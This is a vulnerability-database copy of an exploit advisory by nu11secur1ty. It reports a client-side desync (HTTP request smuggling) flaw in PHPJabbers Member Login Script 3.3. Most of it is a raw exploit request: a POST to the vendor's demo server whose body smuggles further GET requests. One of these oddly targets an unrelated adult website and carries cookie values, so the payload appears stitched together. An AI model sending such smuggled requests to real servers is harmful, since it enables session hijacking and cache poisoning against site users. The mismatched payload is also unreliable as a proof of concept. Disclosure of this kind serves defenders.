Vulners
Lucene search
Member Login Script 3.3 - Client-side desync
## Title: Member Login Script 3.3 - Client-side desync
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## Description:
The server appears to be vulnerable to client-side desync attacks. A
POST request was sent to the path '/1692959852_473/index.php' with a
second request sent as the body. The server ignored the Content-Length
header and did not close the connection, leading to the smuggled
request being interpreted as the next request.
STATUS: HIGH Vulnerability
[+]Exploit:
```
POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
Cookie: _ga=GA1.2.2069938240.1692907228;
_gid=GA1.2.1275975650.1692907228; _gat=1;
_fbp=fb.1.1692907228280.366290059;
_ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
YellowPages=slk3eokcgmdf0r3t7c020quv35;
pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 1190
Content-Type: application/x-www-form-urlencoded
GET /robots.txt HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
GET /robots.txt HTTP/2
Host: www.pornhub.com
Cookie: platform=pc; ss=405039333413129808;
fg_0d2ec4cbd943df07ec161982a603817e=60256.100000;
fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Full-Version: ""
Sec-Ch-Ua-Arch: ""
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Platform-Version: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Full-Version-List:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
## Time spend:
00:35:00Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2023 00:00Current
7.4High risk
Vulners AI Score7.4